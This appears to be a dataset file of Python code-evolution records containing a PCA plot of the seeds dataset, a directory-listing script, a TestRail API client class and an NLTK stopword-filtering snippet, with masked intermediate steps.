"step-5": "import numpy as np\nfrom sklearn.decomposition import PCA\nimport pandas as pd\nfrom numpy.testing import assert_array_almost_equal\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn import decomposition\nfrom sklearn import datasets\n\ndef transform(x):\n\tif x == 'Kama':\n\t\treturn 0\n\telif x == 'Rosa':\n\t\treturn 1\n\telse:\n\t\treturn 2\n\n\noriginal = pd.read_csv(\"seeds.csv\")\noriginal[\"Class\"] = original[\"Class\"].apply(lambda x: transform(x))\nX = original.drop(\"Class\", 1)\ny = original[\"Class\"] \nfig = plt.figure(1, figsize=(4,3))\nplt.clf()\nax = Axes3D(fig, rect=[0, 0, 0.95, 1], elev=48, azim=134)\n\nplt.cla()\npca= PCA(n_components = 3)\npca.fit(X)\nX = pca.transform(X)\n\nfor name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:\n\tax.text3D(X[y == label, 0].mean(),\n X[y == label, 1].mean() + 1.5,\n X[y == label, 2].mean(), name,\n horizontalalignment='center',\n bbox=dict(alpha=.5, edgecolor='w', facecolor='w'))\n# Reorder the labels to have colors matching the cluster results\ny = np.choose(y, [1, 2, 0]).astype(np.float)\nax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral,\n edgecolor='k')\n\nax.w_xaxis.set_ticklabels([])\nax.w_yaxis.set_ticklabels([])\nax.w_zaxis.set_ticklabels([])\n\nplt.show()\n# pca = PCA(n_components=3)\n# pca.fit(df)\n\n# U, S, VT = np.linalg.svd(df - df.mean(0))\n# #assert_array_almost_equal(VT[:6], pca.components_)\n\n# X_train_pca = pca.transform(df)\n# X_train_pca2 = (df - pca.mean_).dot(pca.components_.T)\n# #assert_array_almost_equal(X_train_pca, X_train_pca2)\n\n# X_projected = pca.inverse_transform(X_train_pca)\n# X_projected2 = X_train_pca.dot(pca.components_) + pca.mean_\n# #assert_array_almost_equal(X_projected, X_projected2)\n\n# loss = ((df - X_projected) ** 2).mean()\n# print(loss)\n# sse_loss = np.sum((df-X_projected)**2)\n# print(sse_loss)\n# print(pca.components_)\n# print(pca.explained_variance_ratio_)\n# # loadings\n# loadings = 
pca.components_.T * np.sqrt(pca.explained_variance_)\n# print(loadings)\n# print(X_projected)\n# print(len(X_projected))\n# print(len(X_projected[0]))\n\n# # We center the data and compute the sample covariance matrix.\n# X_centered = df - np.mean(df, axis=0)\n# cov_matrix = np.dot(X_centered.T, X_centered) / 569\n# eigenvalues = pca.explained_variance_\n# for eigenvalue, eigenvector in zip(eigenvalues, pca.components_): \n# print(np.dot(eigenvector.T, np.dot(cov_matrix, eigenvector)))\n# print(eigenvalue)\n\n#np.savetxt(\"wdbc_ica.csv\", X_projected, delimiter=\",\")\n\n\n# print(pca)\n# print(pca.explained_variance_ratio_)\n# print(pca.singular_values_)\n# print(len(pca.transform(df)))\n# print(len(pca.transform(df)[0]))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for filename in os.listdir('/home/asket/Desktop/DBMS/menu'):
print(filename)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
mylist = []
clist = ['North Indian', 'Italian', 'Continental', 'Chinese', 'Mexican',
'South Indian']
for filename in os.listdir('/home/asket/Desktop/DBMS/menu'):
print(filename)
<|reserved_special_token_1|>
import csv
import json, os
mylist = []
clist = ['North Indian', 'Italian', 'Continental', 'Chinese', 'Mexican',
'South Indian']
for filename in os.listdir('/home/asket/Desktop/DBMS/menu'):
print(filename)
<|reserved_special_token_1|>
import csv
import json,os
mylist=[]
clist=["North Indian","Italian","Continental","Chinese","Mexican","South Indian"]
for filename in os.listdir("/home/asket/Desktop/DBMS/menu"):
print(filename)
|
flexible
|
{
"blob_id": "965db2523f60d83bd338bcc62ab8e5705550aa89",
"index": 6606,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor filename in os.listdir('/home/asket/Desktop/DBMS/menu'):\n print(filename)\n",
"step-3": "<mask token>\nmylist = []\nclist = ['North Indian', 'Italian', 'Continental', 'Chinese', 'Mexican',\n 'South Indian']\nfor filename in os.listdir('/home/asket/Desktop/DBMS/menu'):\n print(filename)\n",
"step-4": "import csv\nimport json, os\nmylist = []\nclist = ['North Indian', 'Italian', 'Continental', 'Chinese', 'Mexican',\n 'South Indian']\nfor filename in os.listdir('/home/asket/Desktop/DBMS/menu'):\n print(filename)\n",
"step-5": "import csv\nimport json,os\nmylist=[]\nclist=[\"North Indian\",\"Italian\",\"Continental\",\"Chinese\",\"Mexican\",\"South Indian\"]\nfor filename in os.listdir(\"/home/asket/Desktop/DBMS/menu\"):\n\tprint(filename)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
TestRail API Categories
"""
from . import _category
from ._session import Session
class TestRailAPI(Session):
    """One accessor per TestRail API category.

    Every property returns a fresh category wrapper bound to this session,
    so access is stateless and repeated lookups are cheap.
    """

    @property
    def attachments(self) -> _category.Attachments:
        """Upload, retrieve and delete attachments.

        Reference: https://www.gurock.com/testrail/docs/api/reference/attachments
        """
        return _category.Attachments(self)

    @property
    def cases(self) -> _category.Cases:
        """Read, create and modify test cases.

        Reference: https://www.gurock.com/testrail/docs/api/reference/cases
        """
        return _category.Cases(self)

    @property
    def case_fields(self) -> _category.CaseFields:
        """Inspect the custom fields defined for test cases.

        Reference: https://www.gurock.com/testrail/docs/api/reference/case-fields
        """
        return _category.CaseFields(self)

    @property
    def case_types(self) -> _category.CaseTypes:
        """Inspect the available case types.

        Reference: https://www.gurock.com/testrail/docs/api/reference/case-types
        """
        return _category.CaseTypes(self)

    @property
    def configurations(self) -> _category.Configurations:
        """Read, create and modify configurations.

        Reference: https://www.gurock.com/testrail/docs/api/reference/configurations
        """
        return _category.Configurations(self)

    @property
    def milestones(self) -> _category.Milestones:
        """Read, create and modify milestones.

        Reference: https://www.gurock.com/testrail/docs/api/reference/milestones
        """
        return _category.Milestones(self)

    @property
    def plans(self) -> _category.Plans:
        """Read, create and modify test plans.

        Reference: https://www.gurock.com/testrail/docs/api/reference/plans
        """
        return _category.Plans(self)

    @property
    def priorities(self) -> _category.Priorities:
        """Inspect the available priorities.

        Reference: https://www.gurock.com/testrail/docs/api/reference/priorities
        """
        return _category.Priorities(self)

    @property
    def projects(self) -> _category.Projects:
        """Read, create and modify projects.

        Reference: https://www.gurock.com/testrail/docs/api/reference/projects
        """
        return _category.Projects(self)

    @property
    def reports(self) -> _category.Reports:
        """Fetch and run the reports exposed to the API.

        Reference: https://www.gurock.com/testrail/docs/api/reference/reports
        """
        return _category.Reports(self)

    @property
    def results(self) -> _category.Results:
        """Read existing test results and add new ones.

        Reference: https://www.gurock.com/testrail/docs/api/reference/results
        """
        return _category.Results(self)

    @property
    def result_fields(self) -> _category.ResultFields:
        """Inspect the custom fields defined for test results.

        Reference: https://www.gurock.com/testrail/docs/api/reference/result-fields
        """
        return _category.ResultFields(self)

    @property
    def runs(self) -> _category.Runs:
        """Read, create and modify test runs.

        Reference: https://www.gurock.com/testrail/docs/api/reference/runs
        """
        return _category.Runs(self)

    @property
    def sections(self) -> _category.Sections:
        """Read, create and modify sections (the grouping unit for cases).

        Reference: https://www.gurock.com/testrail/docs/api/reference/sections
        """
        return _category.Sections(self)

    @property
    def shared_steps(self) -> _category.SharedSteps:
        """Inspect shared steps.

        Reference: https://www.gurock.com/testrail/docs/api/reference/api-shared-steps
        """
        return _category.SharedSteps(self)

    @property
    def statuses(self) -> _category.Statuses:
        """Inspect the available test statuses.

        Reference: https://www.gurock.com/testrail/docs/api/reference/statuses
        """
        return _category.Statuses(self)

    @property
    def suites(self) -> _category.Suites:
        """Read, create and modify test suites.

        Reference: https://www.gurock.com/testrail/docs/api/reference/suites
        """
        return _category.Suites(self)

    @property
    def templates(self) -> _category.Template:
        """Inspect templates (field layouts for cases/results).

        Reference: https://www.gurock.com/testrail/docs/api/reference/templates
        """
        return _category.Template(self)

    @property
    def tests(self) -> _category.Tests:
        """Inspect individual tests.

        Reference: https://www.gurock.com/testrail/docs/api/reference/tests
        """
        return _category.Tests(self)

    @property
    def users(self) -> _category.Users:
        """Inspect users.

        Reference: https://www.gurock.com/testrail/docs/api/reference/users
        """
        return _category.Users(self)
|
normal
|
{
"blob_id": "c2467e94a2ad474f0413e7ee3863aa134bf9c51f",
"index": 3399,
"step-1": "<mask token>\n\n\nclass TestRailAPI(Session):\n <mask token>\n\n @property\n def attachments(self) ->_category.Attachments:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/attachments\n Use the following API methods to upload, retrieve and delete attachments.\n \"\"\"\n return _category.Attachments(self)\n\n @property\n def cases(self) ->_category.Cases:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/cases\n Use the following API methods to request details about test cases and\n to create or modify test cases.\n \"\"\"\n return _category.Cases(self)\n\n @property\n def case_fields(self) ->_category.CaseFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-fields\n Use the following API methods to request details about custom fields\n for test cases.\n \"\"\"\n return _category.CaseFields(self)\n\n @property\n def case_types(self) ->_category.CaseTypes:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-types\n Use the following API methods to request details about case type.\n \"\"\"\n return _category.CaseTypes(self)\n <mask token>\n\n @property\n def milestones(self) ->_category.Milestones:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/milestones\n Use the following API methods to request details about milestones and\n to create or modify milestones.\n \"\"\"\n return _category.Milestones(self)\n\n @property\n def plans(self) ->_category.Plans:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/plans\n Use the following API methods to request details about test plans and\n to create or modify test plans.\n \"\"\"\n return _category.Plans(self)\n\n @property\n def priorities(self) ->_category.Priorities:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/priorities\n Use the following API methods to request details about priorities.\n \"\"\"\n return _category.Priorities(self)\n\n @property\n def projects(self) ->_category.Projects:\n \"\"\"\n 
https://www.gurock.com/testrail/docs/api/reference/projects\n Use the following API methods to request details about projects and\n to create or modify projects\n \"\"\"\n return _category.Projects(self)\n\n @property\n def reports(self) ->_category.Reports:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/reports\n Use the following methods to get and run reports that have been\n made accessible to the API.\n \"\"\"\n return _category.Reports(self)\n <mask token>\n <mask token>\n\n @property\n def runs(self) ->_category.Runs:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/runs\n Use the following API methods to request details about test runs and\n to create or modify test runs.\n \"\"\"\n return _category.Runs(self)\n\n @property\n def sections(self) ->_category.Sections:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/sections\n Use the following API methods to request details about sections and\n to create or modify sections.\n Sections are used to group and organize test cases in test suites.\n \"\"\"\n return _category.Sections(self)\n\n @property\n def shared_steps(self) ->_category.SharedSteps:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/api-shared-steps\n Use the following API methods to request details about shared steps.\n \"\"\"\n return _category.SharedSteps(self)\n\n @property\n def statuses(self) ->_category.Statuses:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/statuses\n Use the following API methods to request details about test statuses.\n \"\"\"\n return _category.Statuses(self)\n\n @property\n def suites(self) ->_category.Suites:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/suites\n Use the following API methods to request details about test suites and\n to create or modify test suites.\n \"\"\"\n return _category.Suites(self)\n\n @property\n def templates(self) ->_category.Template:\n \"\"\"\n 
https://www.gurock.com/testrail/docs/api/reference/templates\n Use the following API methods to request details about templates\n (field layouts for cases/results)\n \"\"\"\n return _category.Template(self)\n\n @property\n def tests(self) ->_category.Tests:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/tests\n Use the following API methods to request details about tests.\n \"\"\"\n return _category.Tests(self)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestRailAPI(Session):\n <mask token>\n\n @property\n def attachments(self) ->_category.Attachments:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/attachments\n Use the following API methods to upload, retrieve and delete attachments.\n \"\"\"\n return _category.Attachments(self)\n\n @property\n def cases(self) ->_category.Cases:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/cases\n Use the following API methods to request details about test cases and\n to create or modify test cases.\n \"\"\"\n return _category.Cases(self)\n\n @property\n def case_fields(self) ->_category.CaseFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-fields\n Use the following API methods to request details about custom fields\n for test cases.\n \"\"\"\n return _category.CaseFields(self)\n\n @property\n def case_types(self) ->_category.CaseTypes:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-types\n Use the following API methods to request details about case type.\n \"\"\"\n return _category.CaseTypes(self)\n\n @property\n def configurations(self) ->_category.Configurations:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/configurations\n Use the following API methods to request details about configurations and\n to create or modify configurations.\n \"\"\"\n return _category.Configurations(self)\n\n @property\n def milestones(self) ->_category.Milestones:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/milestones\n Use the following API methods to request details about milestones and\n to create or modify milestones.\n \"\"\"\n return _category.Milestones(self)\n\n @property\n def plans(self) ->_category.Plans:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/plans\n Use the following API methods to request details about test plans and\n to create or modify test plans.\n \"\"\"\n return _category.Plans(self)\n\n @property\n def 
priorities(self) ->_category.Priorities:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/priorities\n Use the following API methods to request details about priorities.\n \"\"\"\n return _category.Priorities(self)\n\n @property\n def projects(self) ->_category.Projects:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/projects\n Use the following API methods to request details about projects and\n to create or modify projects\n \"\"\"\n return _category.Projects(self)\n\n @property\n def reports(self) ->_category.Reports:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/reports\n Use the following methods to get and run reports that have been\n made accessible to the API.\n \"\"\"\n return _category.Reports(self)\n\n @property\n def results(self) ->_category.Results:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/results\n Use the following API methods to request details about test results and\n to add new test results.\n \"\"\"\n return _category.Results(self)\n\n @property\n def result_fields(self) ->_category.ResultFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/result-fields\n Use the following API methods to request details about custom fields\n for test results.\n \"\"\"\n return _category.ResultFields(self)\n\n @property\n def runs(self) ->_category.Runs:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/runs\n Use the following API methods to request details about test runs and\n to create or modify test runs.\n \"\"\"\n return _category.Runs(self)\n\n @property\n def sections(self) ->_category.Sections:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/sections\n Use the following API methods to request details about sections and\n to create or modify sections.\n Sections are used to group and organize test cases in test suites.\n \"\"\"\n return _category.Sections(self)\n\n @property\n def shared_steps(self) ->_category.SharedSteps:\n \"\"\"\n 
https://www.gurock.com/testrail/docs/api/reference/api-shared-steps\n Use the following API methods to request details about shared steps.\n \"\"\"\n return _category.SharedSteps(self)\n\n @property\n def statuses(self) ->_category.Statuses:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/statuses\n Use the following API methods to request details about test statuses.\n \"\"\"\n return _category.Statuses(self)\n\n @property\n def suites(self) ->_category.Suites:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/suites\n Use the following API methods to request details about test suites and\n to create or modify test suites.\n \"\"\"\n return _category.Suites(self)\n\n @property\n def templates(self) ->_category.Template:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/templates\n Use the following API methods to request details about templates\n (field layouts for cases/results)\n \"\"\"\n return _category.Template(self)\n\n @property\n def tests(self) ->_category.Tests:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/tests\n Use the following API methods to request details about tests.\n \"\"\"\n return _category.Tests(self)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass TestRailAPI(Session):\n <mask token>\n\n @property\n def attachments(self) ->_category.Attachments:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/attachments\n Use the following API methods to upload, retrieve and delete attachments.\n \"\"\"\n return _category.Attachments(self)\n\n @property\n def cases(self) ->_category.Cases:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/cases\n Use the following API methods to request details about test cases and\n to create or modify test cases.\n \"\"\"\n return _category.Cases(self)\n\n @property\n def case_fields(self) ->_category.CaseFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-fields\n Use the following API methods to request details about custom fields\n for test cases.\n \"\"\"\n return _category.CaseFields(self)\n\n @property\n def case_types(self) ->_category.CaseTypes:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-types\n Use the following API methods to request details about case type.\n \"\"\"\n return _category.CaseTypes(self)\n\n @property\n def configurations(self) ->_category.Configurations:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/configurations\n Use the following API methods to request details about configurations and\n to create or modify configurations.\n \"\"\"\n return _category.Configurations(self)\n\n @property\n def milestones(self) ->_category.Milestones:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/milestones\n Use the following API methods to request details about milestones and\n to create or modify milestones.\n \"\"\"\n return _category.Milestones(self)\n\n @property\n def plans(self) ->_category.Plans:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/plans\n Use the following API methods to request details about test plans and\n to create or modify test plans.\n \"\"\"\n return _category.Plans(self)\n\n @property\n def 
priorities(self) ->_category.Priorities:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/priorities\n Use the following API methods to request details about priorities.\n \"\"\"\n return _category.Priorities(self)\n\n @property\n def projects(self) ->_category.Projects:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/projects\n Use the following API methods to request details about projects and\n to create or modify projects\n \"\"\"\n return _category.Projects(self)\n\n @property\n def reports(self) ->_category.Reports:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/reports\n Use the following methods to get and run reports that have been\n made accessible to the API.\n \"\"\"\n return _category.Reports(self)\n\n @property\n def results(self) ->_category.Results:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/results\n Use the following API methods to request details about test results and\n to add new test results.\n \"\"\"\n return _category.Results(self)\n\n @property\n def result_fields(self) ->_category.ResultFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/result-fields\n Use the following API methods to request details about custom fields\n for test results.\n \"\"\"\n return _category.ResultFields(self)\n\n @property\n def runs(self) ->_category.Runs:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/runs\n Use the following API methods to request details about test runs and\n to create or modify test runs.\n \"\"\"\n return _category.Runs(self)\n\n @property\n def sections(self) ->_category.Sections:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/sections\n Use the following API methods to request details about sections and\n to create or modify sections.\n Sections are used to group and organize test cases in test suites.\n \"\"\"\n return _category.Sections(self)\n\n @property\n def shared_steps(self) ->_category.SharedSteps:\n \"\"\"\n 
https://www.gurock.com/testrail/docs/api/reference/api-shared-steps\n Use the following API methods to request details about shared steps.\n \"\"\"\n return _category.SharedSteps(self)\n\n @property\n def statuses(self) ->_category.Statuses:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/statuses\n Use the following API methods to request details about test statuses.\n \"\"\"\n return _category.Statuses(self)\n\n @property\n def suites(self) ->_category.Suites:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/suites\n Use the following API methods to request details about test suites and\n to create or modify test suites.\n \"\"\"\n return _category.Suites(self)\n\n @property\n def templates(self) ->_category.Template:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/templates\n Use the following API methods to request details about templates\n (field layouts for cases/results)\n \"\"\"\n return _category.Template(self)\n\n @property\n def tests(self) ->_category.Tests:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/tests\n Use the following API methods to request details about tests.\n \"\"\"\n return _category.Tests(self)\n\n @property\n def users(self) ->_category.Users:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/users\n Use the following API methods to request details about users.\n \"\"\"\n return _category.Users(self)\n",
"step-4": "<mask token>\n\n\nclass TestRailAPI(Session):\n \"\"\"Categories\"\"\"\n\n @property\n def attachments(self) ->_category.Attachments:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/attachments\n Use the following API methods to upload, retrieve and delete attachments.\n \"\"\"\n return _category.Attachments(self)\n\n @property\n def cases(self) ->_category.Cases:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/cases\n Use the following API methods to request details about test cases and\n to create or modify test cases.\n \"\"\"\n return _category.Cases(self)\n\n @property\n def case_fields(self) ->_category.CaseFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-fields\n Use the following API methods to request details about custom fields\n for test cases.\n \"\"\"\n return _category.CaseFields(self)\n\n @property\n def case_types(self) ->_category.CaseTypes:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-types\n Use the following API methods to request details about case type.\n \"\"\"\n return _category.CaseTypes(self)\n\n @property\n def configurations(self) ->_category.Configurations:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/configurations\n Use the following API methods to request details about configurations and\n to create or modify configurations.\n \"\"\"\n return _category.Configurations(self)\n\n @property\n def milestones(self) ->_category.Milestones:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/milestones\n Use the following API methods to request details about milestones and\n to create or modify milestones.\n \"\"\"\n return _category.Milestones(self)\n\n @property\n def plans(self) ->_category.Plans:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/plans\n Use the following API methods to request details about test plans and\n to create or modify test plans.\n \"\"\"\n return _category.Plans(self)\n\n @property\n def 
priorities(self) ->_category.Priorities:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/priorities\n Use the following API methods to request details about priorities.\n \"\"\"\n return _category.Priorities(self)\n\n @property\n def projects(self) ->_category.Projects:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/projects\n Use the following API methods to request details about projects and\n to create or modify projects\n \"\"\"\n return _category.Projects(self)\n\n @property\n def reports(self) ->_category.Reports:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/reports\n Use the following methods to get and run reports that have been\n made accessible to the API.\n \"\"\"\n return _category.Reports(self)\n\n @property\n def results(self) ->_category.Results:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/results\n Use the following API methods to request details about test results and\n to add new test results.\n \"\"\"\n return _category.Results(self)\n\n @property\n def result_fields(self) ->_category.ResultFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/result-fields\n Use the following API methods to request details about custom fields\n for test results.\n \"\"\"\n return _category.ResultFields(self)\n\n @property\n def runs(self) ->_category.Runs:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/runs\n Use the following API methods to request details about test runs and\n to create or modify test runs.\n \"\"\"\n return _category.Runs(self)\n\n @property\n def sections(self) ->_category.Sections:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/sections\n Use the following API methods to request details about sections and\n to create or modify sections.\n Sections are used to group and organize test cases in test suites.\n \"\"\"\n return _category.Sections(self)\n\n @property\n def shared_steps(self) ->_category.SharedSteps:\n \"\"\"\n 
https://www.gurock.com/testrail/docs/api/reference/api-shared-steps\n Use the following API methods to request details about shared steps.\n \"\"\"\n return _category.SharedSteps(self)\n\n @property\n def statuses(self) ->_category.Statuses:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/statuses\n Use the following API methods to request details about test statuses.\n \"\"\"\n return _category.Statuses(self)\n\n @property\n def suites(self) ->_category.Suites:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/suites\n Use the following API methods to request details about test suites and\n to create or modify test suites.\n \"\"\"\n return _category.Suites(self)\n\n @property\n def templates(self) ->_category.Template:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/templates\n Use the following API methods to request details about templates\n (field layouts for cases/results)\n \"\"\"\n return _category.Template(self)\n\n @property\n def tests(self) ->_category.Tests:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/tests\n Use the following API methods to request details about tests.\n \"\"\"\n return _category.Tests(self)\n\n @property\n def users(self) ->_category.Users:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/users\n Use the following API methods to request details about users.\n \"\"\"\n return _category.Users(self)\n",
"step-5": "\"\"\"\nTestRail API Categories\n\"\"\"\n\nfrom . import _category\nfrom ._session import Session\n\n\nclass TestRailAPI(Session):\n \"\"\"Categories\"\"\"\n\n @property\n def attachments(self) -> _category.Attachments:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/attachments\n Use the following API methods to upload, retrieve and delete attachments.\n \"\"\"\n return _category.Attachments(self)\n\n @property\n def cases(self) -> _category.Cases:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/cases\n Use the following API methods to request details about test cases and\n to create or modify test cases.\n \"\"\"\n return _category.Cases(self)\n\n @property\n def case_fields(self) -> _category.CaseFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-fields\n Use the following API methods to request details about custom fields\n for test cases.\n \"\"\"\n return _category.CaseFields(self)\n\n @property\n def case_types(self) -> _category.CaseTypes:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-types\n Use the following API methods to request details about case type.\n \"\"\"\n return _category.CaseTypes(self)\n\n @property\n def configurations(self) -> _category.Configurations:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/configurations\n Use the following API methods to request details about configurations and\n to create or modify configurations.\n \"\"\"\n return _category.Configurations(self)\n\n @property\n def milestones(self) -> _category.Milestones:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/milestones\n Use the following API methods to request details about milestones and\n to create or modify milestones.\n \"\"\"\n return _category.Milestones(self)\n\n @property\n def plans(self) -> _category.Plans:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/plans\n Use the following API methods to request details about test plans and\n 
to create or modify test plans.\n \"\"\"\n return _category.Plans(self)\n\n @property\n def priorities(self) -> _category.Priorities:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/priorities\n Use the following API methods to request details about priorities.\n \"\"\"\n return _category.Priorities(self)\n\n @property\n def projects(self) -> _category.Projects:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/projects\n Use the following API methods to request details about projects and\n to create or modify projects\n \"\"\"\n return _category.Projects(self)\n\n @property\n def reports(self) -> _category.Reports:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/reports\n Use the following methods to get and run reports that have been\n made accessible to the API.\n \"\"\"\n return _category.Reports(self)\n\n @property\n def results(self) -> _category.Results:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/results\n Use the following API methods to request details about test results and\n to add new test results.\n \"\"\"\n return _category.Results(self)\n\n @property\n def result_fields(self) -> _category.ResultFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/result-fields\n Use the following API methods to request details about custom fields\n for test results.\n \"\"\"\n return _category.ResultFields(self)\n\n @property\n def runs(self) -> _category.Runs:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/runs\n Use the following API methods to request details about test runs and\n to create or modify test runs.\n \"\"\"\n return _category.Runs(self)\n\n @property\n def sections(self) -> _category.Sections:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/sections\n Use the following API methods to request details about sections and\n to create or modify sections.\n Sections are used to group and organize test cases in test suites.\n \"\"\"\n return 
_category.Sections(self)\n\n @property\n def shared_steps(self) -> _category.SharedSteps:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/api-shared-steps\n Use the following API methods to request details about shared steps.\n \"\"\"\n return _category.SharedSteps(self)\n\n @property\n def statuses(self) -> _category.Statuses:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/statuses\n Use the following API methods to request details about test statuses.\n \"\"\"\n return _category.Statuses(self)\n\n @property\n def suites(self) -> _category.Suites:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/suites\n Use the following API methods to request details about test suites and\n to create or modify test suites.\n \"\"\"\n return _category.Suites(self)\n\n @property\n def templates(self) -> _category.Template:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/templates\n Use the following API methods to request details about templates\n (field layouts for cases/results)\n \"\"\"\n return _category.Template(self)\n\n @property\n def tests(self) -> _category.Tests:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/tests\n Use the following API methods to request details about tests.\n \"\"\"\n return _category.Tests(self)\n\n @property\n def users(self) -> _category.Users:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/users\n Use the following API methods to request details about users.\n \"\"\"\n return _category.Users(self)\n",
"step-ids": [
17,
20,
21,
22,
24
]
}
|
[
17,
20,
21,
22,
24
] |
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
#Print Stop words
stop_words = set(stopwords.words("english"))
print(stop_words)
example_text = "This is general sentence to just clarify if stop words are working or not. I have some awesome projects coming up"
words = word_tokenize(example_text)
filtered_sentence = []
for w in words:
for w not in stop_words:
filtered_sentence.append(w)
#print filtered sentences
print(filtered_sentence)
#print in a line
filtered_sentence1 = [w for w in words if not w in stop_words]
#print filtered sentences
print(filtered_sentence1)
|
normal
|
{
"blob_id": "90f5629ac48edfccea57243ffb6188a98123367d",
"index": 5197,
